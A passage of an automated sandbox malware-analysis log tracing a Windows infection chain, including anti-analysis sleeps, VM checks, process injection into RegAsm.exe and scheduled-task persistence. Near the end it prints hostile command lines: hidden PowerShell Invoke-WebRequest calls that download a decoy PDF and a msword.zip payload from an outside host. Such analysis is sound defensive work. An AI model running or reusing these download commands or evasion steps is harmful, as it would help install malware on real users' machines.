Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Memory allocated: 27A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Memory allocated: 2970000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Memory allocated: 4970000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3949	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4524	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3590	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7253
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2258
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Window / User API: threadDelayed 3744
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Window / User API: threadDelayed 8238
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Window / User API: threadDelayed 1594

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	API coverage: 4.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep count: 3949 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6516	Thread sleep count: 4524 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6804	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5528	Thread sleep count: 3590 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1600	Thread sleep count: 219 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep count: 7253 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep count: 2258 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 4180	Thread sleep time: -37440s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 2292	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6224	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6224	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 2352	Thread sleep count: 8238 > 30
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 2352	Thread sleep count: 1594 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Thread sleep count: Count: 3744 delay: -10

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_004062D5 FindFirstFileW,FindClose,	14_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_00402E18 FindFirstFileW,	14_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	14_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	24_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,	24_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	24_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	24_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	24_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AECD14 FindFirstFileW,FindClose,	24_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	24_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	24_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	24_2_00AEFA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00284005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00284005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_0028C2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028494A GetFileAttributesW,FindFirstFileW,FindClose,	32_2_0028494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028CD14 FindFirstFileW,FindClose,	32_2_0028CD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	32_2_0028CD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0028F5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	32_2_0028F735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0028FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	32_2_0028FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00283CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	32_2_00283CE2

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00A95D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

24_2_00A95D13

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior

Source: mshta.exe, 00000000.00000002.2179032365.000000000AA70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW=1
Source: mshta.exe, 00000000.00000002.2178093355.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2153198668.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2179032365.000000000AA90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000002.2179032365.000000000AA90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_
Source: Carter.pif, 00000018.00000002.4500542402.0000000001B33000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4498969809.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AF45D5 BlockInput,

24_2_00AF45D5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

24_2_00A95240

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AB5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

24_2_00AB5CAC

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 14_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

14_2_004062FC

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

24_2_00AD88CD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00AAA385
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AAA354 SetUnhandledExceptionFilter,	24_2_00AAA354
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024A354 SetUnhandledExceptionFilter,	32_2_0024A354
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0024A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_0024A385

Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Memory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 760000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Memory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 760000
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Memory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 809000

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AD9369 LogonUserW,

24_2_00AD9369

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

24_2_00A95240

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AE1AC6 SendInput,keybd_event,

24_2_00AE1AC6

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AE51E2 mouse_event,

24_2_00AE51E2

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
